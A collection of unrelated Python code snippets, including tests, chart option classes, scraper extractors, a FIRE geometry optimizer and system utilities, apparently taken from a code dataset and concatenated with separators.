if ((not stop_ignoring) and f_globals.get('__name__', '').startswith(skip_top_modules)):
continue
stop_ignoring = True
f_locals = getattr(frame, 'f_locals', {})
if (not _getitem_from_frame(f_locals, '__traceback_hide__')):
frames_count += 1
(yield (frame, frame.f_lineno)) |
def get_mmseqs_version():
mmseqs_version = None
cmd = f'{MMSEQS2} version'
try:
completed_process = run(cmd, capture_output=True, check=True, shell=True)
if (completed_process is not None):
mmseqs_version = f"MMseqs2 version found: {completed_process.stdout.decode('utf-8').strip()}"
except CalledProcessError as cpe:
print(("Couldn't find MMseqs2: " + cpe.stderr.decode('utf-8').strip().split('\n')[(- 1)]), file=sys.stderr)
mmseqs_version = 'MMseqs2 was not found.'
return mmseqs_version |
class OPtionsHierarchical(DataClass):
def enabled(self):
return self._attrs['enabled']
def enabled(self, val):
self._attrs['enabled'] = val
def levelSeparation(self):
return self._attrs['levelSeparation']
def levelSeparation(self, val):
self._attrs['levelSeparation'] = val
def nodeSpacing(self):
return self._attrs['nodeSpacing']
def nodeSpacing(self, val):
self._attrs['nodeSpacing'] = val
def treeSpacing(self):
return self._attrs['treeSpacing']
def treeSpacing(self, val):
self._attrs['treeSpacing'] = val
def blockShifting(self):
return self._attrs['blockShifting']
def blockShifting(self, val):
self._attrs['blockShifting'] = val
def edgeMinimization(self):
return self._attrs['edgeMinimization']
def edgeMinimization(self, val):
self._attrs['edgeMinimization'] = val
def parentCentralization(self):
return self._attrs['parentCentralization']
def parentCentralization(self, val):
self._attrs['parentCentralization'] = val |
def test_no_exo_floor_div_triangular_access(golden):
def foo(N: size, x: f32[(N, N)]):
for ii in seq(0, (N % 4)):
for joo in seq(0, ((ii + ((N / 4) * 4)) / 16)):
x[(ii, joo)] = 0.0
(c_file, h_file) = compile_procs_to_strings([foo], 'test.h')
code = f'''{h_file}
{c_file}'''
assert (code == golden) |
def extractLptransPassionstampCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('Legend of the Continental Heroes', 'Legend of the Continental Heroes', 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
.django_db
def test_spending_by_award_tas_dates(client, monkeypatch, elasticsearch_award_index, mock_tas_data):
setup_elasticsearch_test(monkeypatch, elasticsearch_award_index)
data = {'filters': {'tas_codes': [{'aid': '028', 'main': '8006', 'bpoa': '2011'}], 'award_type_codes': ['A', 'B', 'C', 'D']}, 'fields': ['Award ID'], 'subawards': False}
resp = client.post('/api/v2/search/spending_by_award', content_type='application/json', data=json.dumps(data))
assert (resp.status_code == status.HTTP_200_OK)
assert (len(resp.data['results']) == 1)
data = {'filters': {'tas_codes': [{'aid': '028', 'main': '8006', 'epoa': '2013'}], 'award_type_codes': ['A', 'B', 'C', 'D']}, 'fields': ['Award ID'], 'subawards': False}
resp = client.post('/api/v2/search/spending_by_award', content_type='application/json', data=json.dumps(data))
assert (resp.status_code == status.HTTP_200_OK)
assert (len(resp.data['results']) == 2) |
def test_delete_stream_admin(db, client, admin_jwt):
stream = get_stream(db)
response = client.delete(f'/v1/video-streams/{stream.id}', content_type='application/vnd.api+json', headers=admin_jwt)
assert (response.status_code == 200)
stream = VideoStream.query.get(stream.id)
assert (stream == None) |
('cuda.var.gen_function')
def var_gen_function(func_attrs) -> str:
bessel = ('true' if func_attrs['unbiased'] else 'false')
backend_spec = CUDASpec()
output_type = func_attrs['outputs'][0]._attrs['dtype']
elem_output_type = backend_spec.dtype_to_lib_type(output_type)
acc_type = 'float'
if (Target.current()._kwargs.get('use_fp16_acc', False) and (output_type == 'float16')):
acc_type = elem_output_type
welford_type = f'WelfordData<{acc_type}, {bessel}>'
return reduce_3d.gen_function(func_attrs, 'cutlass::welford_op', reduce_3d.DEFAULT_PROLOGUE_TEMPLATE, reduce_3d.DEFAULT_EPILOGUE_SCALAR_TEMPLATE, EXTRA_CODE_TEMPLATE.render(acc_type=acc_type), accumulation_type=welford_type) |
class OptionPlotoptionsSolidgaugeSonificationTracksPointgrouping(Options):
def algorithm(self):
return self._config_get('minmax')
def algorithm(self, text: str):
self._config(text, js_type=False)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def groupTimespan(self):
return self._config_get(15)
def groupTimespan(self, num: float):
self._config(num, js_type=False)
def prop(self):
return self._config_get('y')
def prop(self, text: str):
self._config(text, js_type=False) |
class SagemakerTrainingJobConfig(object):
training_job_resource_config: _training_job_models.TrainingJobResourceConfig
algorithm_specification: _training_job_models.AlgorithmSpecification
should_persist_output: typing.Callable[([DistributedTrainingContext], bool)] = (lambda dctx: (dctx.current_host == dctx.hosts[0])) |
class SparkPSI(SparkStatTestImpl):
base_stat_test = psi_stat_test
def __call__(self, data: SpartStatTestData, feature_type: ColumnType, threshold: float) -> StatTestFuncReturns:
cur = data.current_data
ref = data.reference_data
column_name = data.column_name
(reference_percents, current_percents) = get_binned_data(ref, cur, column_name, feature_type)
psi_values = ((reference_percents - current_percents) * np.log((reference_percents / current_percents)))
psi_value = np.sum(psi_values)
return (psi_value, (psi_value >= threshold)) |
def run_dev_modal_com():
modal_run_cmd = ['modal', 'serve', 'app']
try:
console.print(f" [bold cyan]Running FastAPI app with command: {' '.join(modal_run_cmd)}[/bold cyan]")
subprocess.run(modal_run_cmd, check=True)
except subprocess.CalledProcessError as e:
console.print(f' [bold red]An error occurred: {e}[/bold red]')
except KeyboardInterrupt:
console.print('\n [bold yellow]FastAPI server stopped[/bold yellow]') |
('dftbp')
.parametrize('root, ref_energy, ref_norm', [(None, (- 19.), 0.), (1, (- 19.), 0.)])
def test_cytosin_es_forces(root, ref_energy, ref_norm):
geom = geom_loader('lib:cytosin.xyz')
calc_kwargs = {'parameter': 'mio-ext', 'root': root, 'track': bool(root)}
calc = DFTBp(**calc_kwargs)
geom.set_calculator(calc)
forces = geom.forces
energy = geom.energy
norm = np.linalg.norm(forces)
assert (norm == pytest.approx(ref_norm))
print('energy', energy) |
_handler(commands=['find'])
def find(message: types.Message):
global freeid
if (message.chat.id not in users):
bot.send_message(message.chat.id, 'Finding...')
if (freeid is None):
freeid = message.chat.id
else:
bot.send_message(message.chat.id, 'Founded!')
bot.send_message(freeid, 'Founded!')
users[freeid] = message.chat.id
users[message.chat.id] = freeid
freeid = None
print(users, freeid)
else:
bot.send_message(message.chat.id, 'Shut up!') |
class TableQueryValues(SqlTree):
type: Type
name: str
rows: list
def _compile(self, qb):
if (qb.target != 'bigquery'):
values_cls = Values
fields = [Name(col_type, col_name) for (col_name, col_type) in self.type.elems.items()]
else:
values_cls = BigQueryValues
fields = None
subq = Subquery(self.name, fields, values_cls(self.type, self.rows))
return subq._compile(qb) |
_deserializable
class TextChunker(BaseChunker):
def __init__(self, config: Optional[ChunkerConfig]=None):
if (config is None):
config = ChunkerConfig(chunk_size=300, chunk_overlap=0, length_function=len)
text_splitter = RecursiveCharacterTextSplitter(chunk_size=config.chunk_size, chunk_overlap=config.chunk_overlap, length_function=config.length_function)
super().__init__(text_splitter) |
.django_db
def test_federal_account_content(client, fixture_data):
resp = client.get('/api/v2/federal_accounts/999-0009/', data={'fiscal_year': 2022})
expected_result = {'fiscal_year': '2022', 'id': 9999, 'agency_identifier': '999', 'main_account_code': '0009', 'account_title': 'Custom 99', 'federal_account_code': '999-0009', 'parent_agency_toptier_code': '999', 'parent_agency_name': 'Dept. of Depts', 'bureau_name': 'Test Bureau', 'bureau_slug': 'test-bureau', 'total_obligated_amount': 500.0, 'total_gross_outlay_amount': 800.0, 'total_budgetary_resources': 1000.0, 'children': [{'name': 'Cool Treasury Account', 'code': 'tas-label-99', 'obligated_amount': 500.0, 'gross_outlay_amount': 800.0, 'budgetary_resources_amount': 1000.0}]}
assert (resp.status_code == status.HTTP_200_OK)
assert (resp.json() == expected_result) |
class FIRE(Optimizer):
def __init__(self, geometry, dt=0.1, dt_max=1, N_acc=2, f_inc=1.1, f_acc=0.99, f_dec=0.5, n_reset=0, a_start=0.1, **kwargs):
self.dt = dt
self.dt_max = dt_max
self.N_acc = N_acc
self.f_inc = f_inc
self.f_acc = f_acc
self.f_dec = f_dec
self.n_reset = n_reset
self.a_start = a_start
self.a = self.a_start
self.v = np.zeros_like(geometry.coords)
self.velocities = [self.v]
self.time_deltas = [self.dt]
super().__init__(geometry, **kwargs)
def _get_opt_restart_info(self):
opt_restart_info = {'a': self.a, 'dt': self.dt, 'n_reset': self.n_reset, 'time_delta': self.time_deltas[(- 1)], 'velocity': self.velocities[(- 1)].tolist()}
return opt_restart_info
def _set_opt_restart_info(self, opt_restart_info):
self.a = opt_restart_info['a']
self.dt = opt_restart_info['dt']
self.n_reset = opt_restart_info['n_reset']
self.time_deltas = [opt_restart_info['time_delta']]
velocity = np.array(opt_restart_info['velocity'], dtype=float)
self.velocities = [velocity]
def reset(self):
pass
def optimize(self):
if (self.is_cos and self.align):
((self.v,), _, _) = self.fit_rigid(vectors=(self.v,))
self.forces.append(self.geometry.forces)
self.energies.append(self.geometry.energy)
forces = self.forces[(- 1)]
mixed_v = (((1.0 - self.a) * self.v) + ((self.a * np.sqrt((np.dot(self.v, self.v) / np.dot(forces, forces)))) * forces))
last_v = self.velocities[(- 1)]
if ((self.cur_cycle > 0) and (np.dot(last_v, forces) > 0)):
if (self.n_reset > self.N_acc):
self.dt = min((self.dt * self.f_inc), self.dt_max)
self.a *= self.f_acc
self.n_reset += 1
else:
mixed_v = np.zeros_like(forces)
self.log('resetted velocities')
self.a = self.a_start
self.dt *= self.f_acc
self.n_reset = 0
v = (mixed_v + (self.dt * forces))
self.velocities.append(v)
self.time_deltas.append(self.dt)
steps = (self.dt * v)
steps = self.scale_by_max_step(steps)
velo_norm = np.linalg.norm(v)
self.log(f'dt = {self.dt:.4f}, norm(v) {velo_norm:.4f}')
return steps
def __str__(self):
return 'FIRE optimizer' |
class HddUsage(SensorInterface):
def __init__(self, hostname='', interval=30.0, warn_level=0.95):
self._hdd_usage_warn = warn_level
self._path = LOG_PATH
SensorInterface.__init__(self, hostname, sensorname='HDD Usage', interval=interval)
def reload_parameter(self, settings):
self._hdd_usage_warn = settings.param('sysmon/Disk/usage_warn_level', self._hdd_usage_warn)
self._path = settings.param('sysmon/Disk/path', self._path)
def check_sensor(self):
diag_level = 0
diag_vals = []
diag_msg = ''
try:
hdd = psutil.disk_usage(self._path)
diag_level = 0
diag_vals = []
warn_on_space = (hdd.total * (1.0 - self._hdd_usage_warn))
diag_msg = ('warn at >%s%% (<%s)' % ((self._hdd_usage_warn * 100.0), sizeof_fmt(warn_on_space)))
warn_level = warn_on_space
if (diag_level == DiagnosticStatus.WARN):
warn_level = (warn_level * 1.1)
if (hdd.free <= warn_on_space):
diag_level = DiagnosticStatus.WARN
diag_msg = ('Free disk space on log path only %s (warn on <%s)' % (sizeof_fmt(hdd.free), sizeof_fmt(warn_on_space)))
diag_vals.append(KeyValue(key='Free', value=hdd.free))
diag_vals.append(KeyValue(key='Free [%]', value=('%.2f' % (100.0 - hdd.percent))))
diag_vals.append(KeyValue(key='Path', value=self._path))
except Exception as err:
warn_level = DiagnosticStatus.WARN
diag_msg = ('%s' % err)
diag_vals.append(KeyValue(key='Free', value='---'))
diag_vals.append(KeyValue(key='Free [%]', value='---'))
diag_vals.append(KeyValue(key='Path', value=self._path))
with self.mutex:
self._ts_last = time.time()
self._stat_msg.level = diag_level
self._stat_msg.values = diag_vals
self._stat_msg.message = diag_msg |
class OptionSeriesAreasplinerangeSonificationDefaultinstrumentoptionsMappingLowpass(Options):
def frequency(self) -> 'OptionSeriesAreasplinerangeSonificationDefaultinstrumentoptionsMappingLowpassFrequency':
return self._config_sub_data('frequency', OptionSeriesAreasplinerangeSonificationDefaultinstrumentoptionsMappingLowpassFrequency)
def resonance(self) -> 'OptionSeriesAreasplinerangeSonificationDefaultinstrumentoptionsMappingLowpassResonance':
return self._config_sub_data('resonance', OptionSeriesAreasplinerangeSonificationDefaultinstrumentoptionsMappingLowpassResonance) |
class _TestController(ControllerBase):
def __init__(self, req, link, data, **config):
super(_TestController, self).__init__(req, link, data, **config)
eq_(data['test_param'], 'foo')
('test', '/test/{dpid}', methods=['GET'], requirements={'dpid': dpidlib.DPID_PATTERN})
def test_get_dpid(self, req, dpid, **_kwargs):
return Response(status=200, body=dpid)
('test', '/test')
def test_root(self, req, **_kwargs):
return Response(status=200, body='root') |
def test_init_identity_negative():
name = 'some_name'
address_1 = 'some_address'
addresses_1 = {'some_ledger_id': 'some_address'}
addresses_2 = {}
public_key_1 = 'some_public_key'
public_keys_1 = {'some_ledger_id': 'some_public_key'}
public_keys_2 = {}
with pytest.raises(ValueError, match='Provide a key for the default address.'):
Identity(name, default_address_key=None)
with pytest.raises(ValueError, match='Either provide a single address or a dictionary of addresses, and not both.'):
Identity(name)
with pytest.raises(ValueError, match='Either provide a single address or a dictionary of addresses, and not both.'):
Identity(name, address=address_1, addresses=addresses_1)
with pytest.raises(ValueError, match='Provide at least one pair of addresses.'):
Identity(name, addresses=addresses_2)
with pytest.raises(ValueError, match='If you provide a dictionary of addresses, you must provide its corresponding dictionary of public keys.'):
Identity(name, addresses=addresses_1)
with pytest.raises(ValueError, match='If you provide a dictionary of addresses, you must not provide a single public key.'):
Identity(name, addresses=addresses_1, public_key=public_key_1)
with pytest.raises(AEAEnforceError, match='Keys in public keys and addresses dictionaries do not match. They must be identical.'):
Identity(name, addresses=addresses_1, public_keys=public_keys_2)
with pytest.raises(AEAEnforceError, match='The default address key must exist in both addresses and public keys dictionaries.'):
Identity(name, addresses=addresses_1, public_keys=public_keys_1, default_address_key='some_other_ledger')
with pytest.raises(ValueError, match='If you provide a single address, you must not provide a dictionary of public keys.'):
Identity(name, address=address_1, public_keys=public_keys_1)
with pytest.raises(ValueError, match='If you provide a single address, you must provide its corresponding public key.'):
Identity(name, address=address_1) |
def test_working_hours_argument_data_is_not_in_correct_range1():
import copy
from stalker import defaults
wh = copy.copy(defaults.working_hours)
wh['sun'] = [[(- 10), 1000]]
with pytest.raises(ValueError) as cm:
WorkingHours(working_hours=wh)
assert (str(cm.value) == 'WorkingHours.working_hours value should be a list of lists of two integers between and the range of integers should be 0-1440, not [[-10, 1000]]') |
.parametrize('address, slot, new_value', ((INVALID_ADDRESS, 0, 0), (ADDRESS, b'\x00', 0), (ADDRESS, 0, b'\x00'), (ADDRESS, 0, None), (ADDRESS, None, 0)))
def test_set_storage_input_validation(state, address, slot, new_value):
with pytest.raises(ValidationError):
state.set_storage(address, slot, new_value) |
class ForceReply(JsonSerializable):
def __init__(self, selective: Optional[bool]=None, input_field_placeholder: Optional[str]=None):
self.selective: bool = selective
self.input_field_placeholder: str = input_field_placeholder
def to_json(self):
json_dict = {'force_reply': True}
if (self.selective is not None):
json_dict['selective'] = self.selective
if self.input_field_placeholder:
json_dict['input_field_placeholder'] = self.input_field_placeholder
return json.dumps(json_dict) |
class PatchConfig():
def __init__(self, config_overwrite: 'dict | None'=None, initial_config_overwrite: 'dict | None'=None, read_initial: bool=False):
self.initial_config_overwrite = initial_config_overwrite
self.config_overwrite = config_overwrite
self.read_initial = read_initial
self.conf_save = None
def __enter__(self):
self.conf_save = override_config(initial_config_overwrite=self.initial_config_overwrite, config_overwrite=self.config_overwrite, read_initial=self.read_initial)
def __exit__(self, exc_type, exc_val, exc_tb):
if self.conf_save:
(foundry_dev_tools.config.INITIAL_CONFIG, foundry_dev_tools.config.FOUNDRY_DEV_TOOLS_DIRECTORY, foundry_dev_tools.config.FOUNDRY_DEV_TOOLS_PROJECT_CONFIG_FILE) = self.conf_save[0]
foundry_dev_tools.config.Configuration = self.conf_save[1] |
def has_been_completed_by(poll, user):
user_votes = TopicPollVote.objects.filter(poll_option__poll=poll)
if user.is_anonymous:
forum_key = get_anonymous_user_forum_key(user)
user_votes = (user_votes.filter(anonymous_key=forum_key) if forum_key else user_votes.none())
else:
user_votes = user_votes.filter(voter=user)
return user_votes.exists() |
def write_date(f, t_millis):
write_scalar(f, datetime.datetime.now().strftime('%H%M%S.%f'))
write_scalar(f, t_millis)
write_vector(f, rover.x)
write_vector(f, rover.v)
write_vector(f, rover.a)
write_vector(f, rover.W)
write_3x3(f, rover.R)
write_vector(f, rover.control.xd)
write_vector(f, rover.control.xd_dot)
write_vector(f, rover.control.b1d)
write_vector(f, rover.control.Wd)
write_3x3(f, rover.control.Rd)
f.write('\n') |
def test_short_deck_1():
n_players = 3
(state, _) = _new_game(n_players=n_players)
player_i_order = [2, 0, 1]
for i in range(n_players):
assert (state.current_player.name == f'player_{player_i_order[i]}')
assert (len(state.legal_actions) == 3)
assert (state.betting_stage == 'pre_flop')
state = state.apply_action(action_str='call')
assert (state.betting_stage == 'flop')
for player_i in range((n_players - 1)):
assert (state.current_player.name == f'player_{player_i}')
assert (len(state.legal_actions) == 3)
assert (state.betting_stage == 'flop')
state = state.apply_action(action_str='fold')
assert state.is_terminal, 'state was not terminal'
assert (state.betting_stage == 'terminal') |
class FunctionCall(Expression, TupleMixin):
expression: Expression
arguments: List[Expression]
names: List[str]
is_local = synthesized()
call_type = synthesized()
call_info = synthesized()
def call_info(self, arguments: {Expression.expression_value, Expression.cfg}):
argument_values = [a.expression_value for a in arguments]
argument_cfgs = [a.cfg for a in arguments]
return FunctionCallInfo(self, argument_values, argument_cfgs, self.result_arity)
def is_local(self, expression):
return expression.type_descriptions['typeIdentifier'].startswith('t_function_internal')
def call_type(self, expression: {Expression.expression_value}):
return ('conversion' if (self.kind == 'typeConversion') else ('constructor' if (self.kind == 'structConstructorCall') else ('builtin' if isinstance(expression.expression_value, CallableImpl) else ('new' if isinstance(expression, NewExpression) else 'jump'))))
def expression_value(self):
if (self.result_arity == 1):
return self.flattened_expression_values[0]
return UndefinedAttribute('expression_value is not applicable for FunctionCalls with tuple-typed return values. Please use flattened_expression_values instead.')
def flattened_expression_values(self, expression, arguments: {TupleMixin.flattened_expression_values, Expression.expression_value}):
if (self.call_type == 'conversion'):
assert (len(arguments) == 1)
return as_array((arguments[0].flattened_expression_values if isinstance(arguments[0], TupleMixin) else arguments[0].expression_value))
if (self.call_type == 'constructor'):
return [ir.Const(self, 'New Struct')]
if (self.call_type == 'new'):
return [expression.expression_value]
if (self.call_type == 'builtin'):
builtin: CallableImpl = expression.expression_value
builtin.setup(self.call_info)
return builtin.flattened_expression_values
return [ir.Argument(self) for _ in range(self.result_arity)]
def cfg(self, expression: {MemberAccess.base_expression_value, MemberAccess.base_expression_cfg}, arguments: {Expression.expression_value, Expression.cfg}):
cfg = CfgSimple.concatenate(*map(__.cfg, arguments))
if (self.call_type == 'conversion'):
pass
elif (self.call_type == 'constructor'):
cfg >>= expression.cfg
cfg >>= self.flattened_expression_values[0]
elif (self.call_type == 'new'):
cfg >>= expression.cfg
cfg >>= self.flattened_expression_values[0]
elif (self.call_type == 'builtin'):
builtin: CallableImpl = expression.expression_value
builtin.setup(self.call_info)
cfg >>= builtin.cfg
elif (self.call_type == 'jump'):
assert self.is_local
cont = ir.Block(self, self.flattened_expression_values, info='CONTINUATION')
arg_values = [arg.expression_value for arg in arguments]
(pre, transfer, continuation) = self.cfg_jump(expression, cont, arg_values)
cfg >>= (pre >> CfgSimple.statements(transfer, continuation))
else:
raise NotImplementedError()
return cfg
def cfg_jump(self, expression, cont, arg_values):
if isinstance(expression, MemberAccess):
base = expression.expression
if (isinstance(base, Identifier) and (base.name == 'this')):
dest = ir.JumpDestination(expression, expression.expression.name)
else:
dest = ir.JumpDestination(expression, expression.member_name)
elif isinstance(expression, Identifier):
if isinstance(expression.resolve(), FunctionDefinition):
dest = ir.JumpDestination(expression, expression.name)
else:
raise CfgCompilationNotSupportedError('Function variables not yet supported')
else:
raise NotImplementedError('Function call to unexpected element', expression)
transfer = ir.Jump(self, dest, cont, arg_values, self.names)
return (CfgSimple.empty(), transfer, cont) |
def encode(ffrom, fto, data_segment):
ffrom = BytesIO(file_read(ffrom))
fto = BytesIO(file_read(fto))
(from_call0, from_data_pointers, from_code_pointers) = disassemble(ffrom, data_segment.from_data_offset_begin, data_segment.from_data_offset_end, data_segment.from_data_begin, data_segment.from_data_end, data_segment.from_code_begin, data_segment.from_code_end)
(to_call0, to_data_pointers, to_code_pointers) = disassemble(fto, data_segment.to_data_offset_begin, data_segment.to_data_offset_end, data_segment.to_data_begin, data_segment.to_data_end, data_segment.to_code_begin, data_segment.to_code_end)
(data_pointers_header, data_pointers) = create_data_pointers_patch_block(ffrom, fto, data_segment.from_data_offset_begin, data_segment.from_data_begin, data_segment.from_data_end, from_data_pointers, to_data_pointers)
(code_pointers_header, code_pointers) = create_code_pointers_patch_block(ffrom, fto, data_segment.from_code_begin, data_segment.from_code_end, from_code_pointers, to_code_pointers)
call0 = create_patch_block(ffrom, fto, from_call0, to_call0, overwrite_size=3)
(headers, datas) = zip(data_pointers, code_pointers, call0)
patch = b''.join((([data_pointers_header, code_pointers_header] + list(headers)) + list(datas)))
return (ffrom, fto, patch) |
def extractTheSunIsColdTranslations(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
if ('108 maidens' in item['tags']):
return buildReleaseMessageWithType(item, '108 Maidens of Destiny', vol, chp, frag=frag, postfix=postfix)
if ('Back to the Apocalypse' in item['tags']):
return buildReleaseMessageWithType(item, 'Back to the Apocalypse', vol, chp, frag=frag, postfix=postfix)
return False |
def render_contacts(pb_client, model, scale_h=0.0005, scale_r=0.01, color=[1.0, 0.1, 0.0, 0.5]):
data = pb_client.getContactPoints(model)
for d in data:
(p, n, l) = (np.array(d[6]), np.array(d[7]), d[9])
p1 = p
p2 = (p + ((n * l) * scale_h))
gl_render.render_arrow(p1, p2, D=scale_r, color=color) |
class VGG(object):
def __init__(self, weights_path, layers=VGG19_LAYERS):
self.weights = load_vgg_weights(weights_path)
self.layers = layers
def forward(self, image):
idx = 0
net = {}
current = image
for name in self.layers:
kind = name[:4]
if (kind == 'conv'):
(kernel, bias) = self.weights[idx]
idx += 1
current = conv_layer(current, kernel, bias)
elif (kind == 'relu'):
current = tf.nn.relu(current)
elif (kind == 'pool'):
current = pool_layer(current)
net[name] = current
assert (len(net) == len(self.layers))
return net |
def put(domain: str, key: str, value: str) -> None:
conn = _db_conn()
conn.execute('UPDATE ghstack_cache SET value = ? WHERE domain = ? AND key = ?', (value, domain, key))
c = conn.execute('\n INSERT INTO ghstack_cache (domain, key, value)\n SELECT ?, ?, ? WHERE (SELECT Changes() = 0)\n ', (domain, key, value))
if (c.lastrowid is not None):
conn.execute('DELETE FROM ghstack_cache WHERE id < ?', ((c.lastrowid - CACHE_SIZE),))
conn.commit() |
def read_mac(esp, args):
def print_mac(label, mac):
print(('%s: %s' % (label, ':'.join(map((lambda x: ('%02x' % x)), mac)))))
eui64 = esp.read_mac('EUI64')
if eui64:
print_mac('MAC', eui64)
print_mac('BASE MAC', esp.read_mac('BASE_MAC'))
print_mac('MAC_EXT', esp.read_mac('MAC_EXT'))
else:
print_mac('MAC', esp.read_mac('BASE_MAC')) |
class TrafficMatrixSequence(object):
def __init__(self, interval=None, t_unit='min'):
self.attrib = {}
if (interval is not None):
if (not (t_unit in time_units)):
raise ValueError('The t_unit argument is not valid')
self.attrib['interval'] = interval
self.attrib['t_unit'] = t_unit
self.matrix = []
return
def __iter__(self):
return iter(self.matrix)
def __len__(self):
return len(self.matrix)
def __getitem__(self, key):
return self.matrix[key]
def __setitem__(self, key, value):
self.matrix[key] = value
def __delitem__(self, key):
del self.matrix[key]
def insert(self, i, tm):
self.matrix.insert(i, tm)
def append(self, tm):
self.matrix.append(tm)
def get(self, i):
return self.matrix[i]
def pop(self, i):
self.matrix.pop(i) |
def test_act_serialization():
msg = GymMessage(message_id=1, dialogue_reference=(str(0), ''), target=0, performative=GymMessage.Performative.ACT, action=GymMessage.AnyObject('some_action'), step_id=1)
msg.to = 'receiver'
envelope = Envelope(to=msg.to, sender='sender', message=msg)
envelope_bytes = envelope.encode()
actual_envelope = Envelope.decode(envelope_bytes)
expected_envelope = envelope
assert (expected_envelope.to == actual_envelope.to)
assert (expected_envelope.sender == actual_envelope.sender)
assert (expected_envelope.protocol_specification_id == actual_envelope.protocol_specification_id)
assert (expected_envelope.message != actual_envelope.message)
actual_msg = GymMessage.serializer.decode(actual_envelope.message)
actual_msg.to = actual_envelope.to
actual_msg.sender = actual_envelope.sender
expected_msg = msg
assert (expected_msg == actual_msg) |
def test_well_gridprops_zone(loadwell1):
grid = xtgeo.grid_from_file('../xtgeo-testdata/3dgrids/reek/reek_sim_grid.roff')
gridzones = xtgeo.gridproperty_from_file('../xtgeo-testdata/3dgrids/reek/reek_sim_zone.roff', grid=grid)
gridzones.name = 'Zone'
well = loadwell1
well.get_gridproperties(gridzones, grid)
well.zonelogname = 'Zone_model'
assert (well.get_logrecord(well.zonelogname) == {1: 'Below_Top_reek', 2: 'Below_Mid_reek', 3: 'Below_Low_reek'}) |
def query_exchange(in_domain: str, out_domain: str, session: Session, target_datetime: (datetime | None)=None) -> (str | None):
params = {'documentType': 'A11', 'in_Domain': in_domain, 'out_Domain': out_domain}
return query_ENTSOE(session, params, target_datetime=target_datetime, function_name=query_exchange.__name__) |
class _SSLContext(object):
def __init__(self, protocol):
self._protocol = protocol
self._certfile = None
self._keyfile = None
self._password = None
def load_cert_chain(self, certfile, keyfile=None, password=None):
self._certfile = certfile
self._keyfile = (keyfile or certfile)
self._password = password
def wrap_socket(self, sock, **kwargs):
if (PY2 and (not isinstance(sock, socket.socket))):
sock = socket.socket(sock.family, sock.type, sock.proto, sock)
return ssl.wrap_socket(sock, keyfile=self._keyfile, certfile=self._certfile, ssl_version=self._protocol, **kwargs) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.